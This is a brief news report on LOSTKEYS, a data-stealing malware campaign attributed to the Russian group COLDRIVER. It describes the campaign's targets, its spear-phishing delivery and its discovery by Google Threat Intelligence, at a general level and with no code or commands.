Cybersecurity experts have uncovered a new malware campaign linked to the Russian hacker group COLDRIVER, also known as Star Blizzard or Callisto. The malware, named LOSTKEYS, has been actively targeting diplomatic institutions, defense contractors, and critical infrastructure organizations across Europe and North America since early 2025.
LOSTKEYS is designed to steal sensitive data, focusing on credentials, confidential documents, and communications. The malware spreads primarily through spear-phishing emails containing malicious attachments. These emails appear legitimate, often pretending to be from trusted partners or government agencies. The attachments exploit previously unknown vulnerabilities in widely used office software.
Once a victim opens the attachment, a multi-stage infection begins in the background. This process ensures the malware remains persistent and undetected by standard security systems.
The campaign was discovered by Google Threat Intelligence researchers, who noticed unusual data transfers from several high-profile organizations. Their investigation revealed sophisticated obfuscation methods and a command-and-control network that uses compromised legitimate websites as proxies to hide the true origin of the attack.
The impact of LOSTKEYS has been severe, with many affected organizations reporting theft of intellectual property and unauthorized access to private communications. The malware’s stealthy design means many victims remain unaware of the breach for extended periods, allowing hackers to maintain ongoing access and continue stealing sensitive information.
Security agencies in multiple countries have issued warnings about the threat. The LOSTKEYS campaign marks a significant evolution in COLDRIVER’s hacking tactics and capabilities, with their targets closely aligned with Russian intelligence interests. This raises confidence in attributing the attack to the group.
